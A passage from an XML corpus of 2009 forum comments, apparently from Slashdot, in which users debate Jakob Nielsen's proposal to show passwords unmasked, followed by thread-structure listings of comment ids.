If this will be mandatory with visual letters I will change my password back to the trustworthy * * * * * * * * * , no one will guess nine stars anyways , to simple to break .</tokentext>
<sentencetext>So my password will at last give a meaning, no more ********* but now the more meaningful KlYtgHjd8 - GREAT!
If this will be mandatory with visual letters I will change my password back to the trustworthy *********, no one will guess nine stars anyways, to simple to break.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475003</id>
	<title>was this a troll?</title>
	<author>Anonymous</author>
	<datestamp>1245934860000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>this sounds likea troll. the guy cant be that much of an asshat.</p></htmltext>
<tokenext>this sounds likea troll .
the guy cant be that much of an asshat .</tokentext>
<sentencetext>this sounds likea troll.
the guy cant be that much of an asshat.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472441</id>
	<title>There is a mixup here.</title>
	<author>Hurricane78</author>
	<datestamp>1245924600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Nielsen is mixing up usability, the science of making interfaces more efficient and usable, with promoting stupidity, the method of making it easier but actually less efficient and useful, to get even the biggest idiot to be able to use it, at the cost of all those more intelligent.</p><p>This itself would be ok, if you chose to have dumber people as your target group.<br>But as soon as you do it, nature invents bigger idiots. And then most companies are making it even simpler. Until it is basically useless, if you got half a brain.</p><p>Good examples of what this results in, are those moments where you notice that the reason you were unable to get your OS / electronics device to do what you like, is that you actually understood what you are doing, and as soon as you just thought like an idiot, you got to the right function.</p></htmltext>
<tokenext>Nielsen is mixing up usability , the science of making interfaces more efficient and usable , with promoting stupidity , the method of making it easier but actually less efficient and useful , to get even the biggest idiot to be able to use it , at the cost of all those more intelligent.This itself would be ok , if you chose to have dumber people as your target group.But as soon as you do it , nature invents bigger idiots .
And then most companies are making it even simpler .
Until it is basically useless , if you got half a brain.Good examples of what this results in , are those moments where you notice that the reason you were unable to get your OS / electronics device to do what you like , is that you actually understood what you are doing , and as soon as you just thought like an idiot , you got to the right function .</tokentext>
<sentencetext>Nielsen is mixing up usability, the science of making interfaces more efficient and usable, with promoting stupidity, the method of making it easier but actually less efficient and useful, to get even the biggest idiot to be able to use it, at the cost of all those more intelligent.This itself would be ok, if you chose to have dumber people as your target group.But as soon as you do it, nature invents bigger idiots.
And then most companies are making it even simpler.
Until it is basically useless, if you got half a brain.Good examples of what this results in, are those moments where you notice that the reason you were unable to get your OS / electronics device to do what you like, is that you actually understood what you are doing, and as soon as you just thought like an idiot, you got to the right function.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473341</id>
	<title>Srsly?</title>
	<author>Twyst3d</author>
	<datestamp>1245928260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I love how IBM makes a selling point of Lotus Notes that everytime you type a character in your password it generates a random low number of characters to keep on lookers from knowing exactly how many characters were typed.  How about you focus on making notes work nearly as well as Office.  Then add goofy crap like this on at the end?   I dont mind asterisks for passwords.  If not being able to see your password as you type it in is slowing you down and is wasting business time.   Pack your bags and GTFO.  Plenty of hungry kids out there quite capable of remembering a damn password more than willing to take your job.</htmltext>
<tokenext>I love how IBM makes a selling point of Lotus Notes that everytime you type a character in your password it generates a random low number of characters to keep on lookers from knowing exactly how many characters were typed .
How about you focus on making notes work nearly as well as Office .
Then add goofy crap like this on at the end ?
I dont mind asterisks for passwords .
If not being able to see your password as you type it in is slowing you down and is wasting business time .
Pack your bags and GTFO .
Plenty of hungry kids out there quite capable of remembering a damn password more than willing to take your job .</tokentext>
<sentencetext>I love how IBM makes a selling point of Lotus Notes that everytime you type a character in your password it generates a random low number of characters to keep on lookers from knowing exactly how many characters were typed.
How about you focus on making notes work nearly as well as Office.
Then add goofy crap like this on at the end?
I dont mind asterisks for passwords.
If not being able to see your password as you type it in is slowing you down and is wasting business time.
Pack your bags and GTFO.
Plenty of hungry kids out there quite capable of remembering a damn password more than willing to take your job.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476267</id>
	<title>This is asinine.</title>
	<author>Anonymous</author>
	<datestamp>1245942120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Even my login is blanked... and I leave the numlock key on to obsfucate my login and pwd... so I ignore the lame warnings about the caps and numlock keys being active...</p></htmltext>
<tokenext>Even my login is blanked... and I leave the numlock key on to obsfucate my login and pwd... so I ignore the lame warnings about the caps and numlock keys being active.. .</tokentext>
<sentencetext>Even my login is blanked... and I leave the numlock key on to obsfucate my login and pwd... so I ignore the lame warnings about the caps and numlock keys being active...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480347</id>
	<title>"Usability" vs. "Convenience"</title>
	<author>userw014</author>
	<datestamp>1246022880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>"Usability" concerns like this is what lead Microsoft to add so many features to their products that have made malware so easy on their platforms (and "compatability" lead to maintaining these features far too long.)</p><p>If you, as a business, are worried about the convenience to your users of visible passwords in order to use your site, then perhaps you ought to re-evaluate why  you need a login at all.  If it's just a matter of user preferences, then perhaps you should do without passwords entirely - if you're willing to take the hit when your users start messing each other up.</p><p>And if you're concerned about the "usability" impact of passwords on your site, then surely you must throw a fit if you actually do any e-commerce - all that extra stuff to do the credit-card or PayPal will surely drive your users away.</p><p>Sure, password masking suggests security that might not be there - and so perhaps discredits those sites where security is taken seriously.  However, password masking does add *some* security - especially if it's done by the browser rather than some ad-hoc Javascript.  At least with the browser, there's only ONE piece of code to  secure (by taking precautions to wipe the password from memory after it's been used.)</p><p>On the other hand, the issue of the "Reset" button has some validity - I do like having a reset button, but it shouldn't be placed too close to the input areas.  More often, though, I find my input being wiped by the browser when I use a key-stroke that does an "erase-to-end-of-line" in my favorite editor that instead wipes my entire input and sends me off some strange direction.  Compared to that, the "Reset" button is far less relevant than focus issues of my GUI/window environment.</p><p>BTW: What makes this guy a "Usability Expert", other than having written a bunch of articles since 1995?  Has he actually been involved in improving any product or process?  Who vouches for this guy?</p></htmltext>
<tokenext>" Usability " concerns like this is what lead Microsoft to add so many features to their products that have made malware so easy on their platforms ( and " compatability " lead to maintaining these features far too long .
) If you , as a business , are worried about the convenience to your users of visible passwords in order to use your site , then perhaps you ought to re-evaluate why you need a login at all .
If it 's just a matter of user preferences , then perhaps you should do without passwords entirely - if you 're willing to take the hit when your users start messing each other up.And if you 're concerned about the " usability " impact of passwords on your site , then surely you must throw a fit if you actually do any e-commerce - all that extra stuff to do the credit-card or PayPal will surely drive your users away.Sure , password masking suggests security that might not be there - and so perhaps discredits those sites where security is taken seriously .
However , password masking does add * some * security - especially if it 's done by the browser rather than some ad-hoc Javascript .
At least with the browser , there 's only ONE piece of code to secure ( by taking precautions to wipe the password from memory after it 's been used .
) On the other hand , the issue of the " Reset " button has some validity - I do like having a reset button , but it should n't be placed too close to the input areas .
More often , though , I find my input being wiped by the browser when I use a key-stroke that does an " erase-to-end-of-line " in my favorite editor that instead wipes my entire input and sends me off some strange direction .
Compared to that , the " Reset " button is far less relevant than focus issues of my GUI/window environment.BTW : What makes this guy a " Usability Expert " , other than having written a bunch of articles since 1995 ?
Has he actually been involved in improving any product or process ?
Who vouches for this guy ?</tokentext>
<sentencetext>"Usability" concerns like this is what lead Microsoft to add so many features to their products that have made malware so easy on their platforms (and "compatability" lead to maintaining these features far too long.
)If you, as a business, are worried about the convenience to your users of visible passwords in order to use your site, then perhaps you ought to re-evaluate why  you need a login at all.
If it's just a matter of user preferences, then perhaps you should do without passwords entirely - if you're willing to take the hit when your users start messing each other up.And if you're concerned about the "usability" impact of passwords on your site, then surely you must throw a fit if you actually do any e-commerce - all that extra stuff to do the credit-card or PayPal will surely drive your users away.Sure, password masking suggests security that might not be there - and so perhaps discredits those sites where security is taken seriously.
However, password masking does add *some* security - especially if it's done by the browser rather than some ad-hoc Javascript.
At least with the browser, there's only ONE piece of code to  secure (by taking precautions to wipe the password from memory after it's been used.
)On the other hand, the issue of the "Reset" button has some validity - I do like having a reset button, but it shouldn't be placed too close to the input areas.
More often, though, I find my input being wiped by the browser when I use a key-stroke that does an "erase-to-end-of-line" in my favorite editor that instead wipes my entire input and sends me off some strange direction.
Compared to that, the "Reset" button is far less relevant than focus issues of my GUI/window environment.BTW: What makes this guy a "Usability Expert", other than having written a bunch of articles since 1995?
Has he actually been involved in improving any product or process?
Who vouches for this guy?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476243</id>
	<title>Doesn't anybody use...</title>
	<author>GunJah</author>
	<datestamp>1245941880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>FingerAuth w/a fingerprint scanner mouse?</p><p>Forget typing, why bother even remembering passwords?  I'm surprised people still mess with those things.</p></htmltext>
<tokenext>FingerAuth w/a fingerprint scanner mouse ? Forget typing , why bother even remembering passwords ?
I 'm surprised people still mess with those things .</tokentext>
<sentencetext>FingerAuth w/a fingerprint scanner mouse?Forget typing, why bother even remembering passwords?
I'm surprised people still mess with those things.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470977</id>
	<title>Ever looked at your password?</title>
	<author>fandingo</author>
	<datestamp>1245963240000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext>Does anyone ever think it's weird to actually look at your password? I never write them down, and I remember them mostly by the location of the keys on the keyboard, not by the actual text.
To me, it's quite unnatural to look at a password.</htmltext>
<tokenext>Does anyone ever think it 's weird to actually look at your password ?
I never write them down , and I remember them mostly by the location of the keys on the keyboard , not by the actual text .
To me , it 's quite unnatural to look at a password .</tokentext>
<sentencetext>Does anyone ever think it's weird to actually look at your password?
I never write them down, and I remember them mostly by the location of the keys on the keyboard, not by the actual text.
To me, it's quite unnatural to look at a password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471261</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>Anonymous</author>
	<datestamp>1245921000000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Most people don't.<br>This is about people who are using there password on a projector, or even in a public terminal.</p></htmltext>
<tokenext>Most people do n't.This is about people who are using there password on a projector , or even in a public terminal .</tokentext>
<sentencetext>Most people don't.This is about people who are using there password on a projector, or even in a public terminal.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</parent>
</comment>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_9</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471053
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_115</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471799
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_107</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473505
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_19</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476125
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_53</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471867
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_64</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471285
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482413
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_51</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474675
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_62</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471575
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_123</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471133
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475529
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_117</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481665
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_86</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472307
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_72</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471299
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_133</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471925
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_131</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472069
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_48</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478035
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_96</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473179
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_80</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480011
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_146</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473097
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_104</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471377
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_58</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471351
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473397
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_2</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471619
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472199
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_16</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471211
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472065
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_90</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477937
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_112</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471261
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_10</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471295
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_29</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470923
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472001
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_75</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475623
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_61</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478477
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_122</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476157
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_120</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472063
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_37</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471233
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472085
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_85</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475323
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_144</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470967
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471179
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_47</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471459
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_93</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471815
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_1</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475481
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_55</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476659
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_13</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470985
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472079
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_66</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475289
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_24</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471569
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_125</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471661
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_76</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471173
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28507569
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_34</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471667
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_135</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471211
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472533
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_98</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471675
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_42</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471455
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_6</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472595
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_106</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471363
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_152</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473295
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_18</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474425
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_52</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472853
</commentlist>
</thread>
<thread>
